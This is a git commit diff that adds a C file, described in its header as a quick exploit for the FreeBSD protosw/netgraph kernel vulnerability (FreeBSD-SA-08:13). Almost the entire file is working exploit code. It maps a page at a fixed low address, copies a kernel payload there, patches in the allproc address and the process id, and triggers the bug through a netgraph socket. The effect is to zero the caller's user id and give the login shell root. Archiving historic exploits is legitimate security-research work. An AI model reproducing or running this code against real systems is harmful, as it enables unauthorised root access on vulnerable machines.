diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-26 21:13:48 -0500 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-02-26 21:13:48 -0500 |
| commit | cc0d7ca2b5f3bde23d10d625e37c60d2af8cc761 (patch) | |
| tree | fd31eaae74c2f1a770a7e6a001fb01e86c779b4c | |
| download | CVE-2008-5736-cc0d7ca2b5f3bde23d10d625e37c60d2af8cc761.tar.xz CVE-2008-5736-cc0d7ca2b5f3bde23d10d625e37c60d2af8cc761.zip | |
Import Don Bailey's original exploit code.
| -rw-r--r-- | original-known-allproc.c | 142 |
1 files changed, 142 insertions, 0 deletions
diff --git a/original-known-allproc.c b/original-known-allproc.c new file mode 100644 index 0000000..ada7e2c --- /dev/null +++ b/original-known-allproc.c @@ -0,0 +1,142 @@ +/* + * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability + * defined here: + * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc + * + * This will overwrite your credential structure in the kernel. This will + * affect more than just the exploit's process, which is why this doesn't + * spawn a shell. When the exploit has finished, your login shell should + * have euid=0. + * + * Enjoy, and happy holidays! + * - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008 + */ +#include <sys/param.h> +#include <sys/mman.h> +#include <sys/time.h> +#include <sys/stat.h> +#include <sys/proc.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netgraph/ng_socket.h> +#include <unistd.h> +#include <stdlib.h> +#include <stdio.h> +#include <errno.h> + +#define PAGES 1 +#define PATTERN1 0x8f8f8f8f +#define PATTERN2 0x6e6e6e6e + +typedef unsigned long ulong; +typedef unsigned char uchar; + +int +x(void) +{ + struct proc * p = (struct proc * )PATTERN1; + uint * i; + + while(1) + { + if(p->p_pid == PATTERN2) + { + i = (uint * )p->p_ucred; + *++i = 0; + break; + } + + p = p->p_list.le_next; + } + + return 1; +} + +int +main(int argc, char * argv[]) +{ + ulong addr; + uchar * c; + uchar * d; + uint * i; + void * v; + int pid; + int s; + + if(argc != 2) + { + fprintf(stderr, "usage: ./x <allproc>\n"); + return 1; + } + + addr = strtoul(argv[1], 0, 0); + + v = mmap( + NULL, + (PAGES*PAGE_SIZE), + PROT_READ|PROT_WRITE|PROT_EXEC, + MAP_ANON|MAP_FIXED, + -1, + 0); + if(v == MAP_FAILED) + { + perror("mmap"); + return 0; + } + + c = v; + d = (uchar * )x; + while(1) + { + *c = *d; + if(*d == 0xc3) + { + break; + } + + d++; + c++; + } + + *c++ = 0xc3; + + c = v; + while(1) + { + if(*(long * )c == PATTERN1) + { + *(c + 0) = addr >> 0; + *(c + 1) = addr >> 8; + *(c + 2) = addr >> 16; + *(c + 3) = addr >> 24; + break; + } + c++; + } + + pid = getpid(); + while(1) + { + if(*(long * )c == PATTERN2) + { + *(c + 0) = pid >> 0; + *(c + 1) = pid >> 8; + *(c + 2) = pid >> 16; + *(c + 3) = pid >> 24; + break; + } + c++; + } + + s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); + if(s < 0) + { + perror("socket"); + return 1; + } + + shutdown(s, SHUT_RDWR); + + return 0; +} + |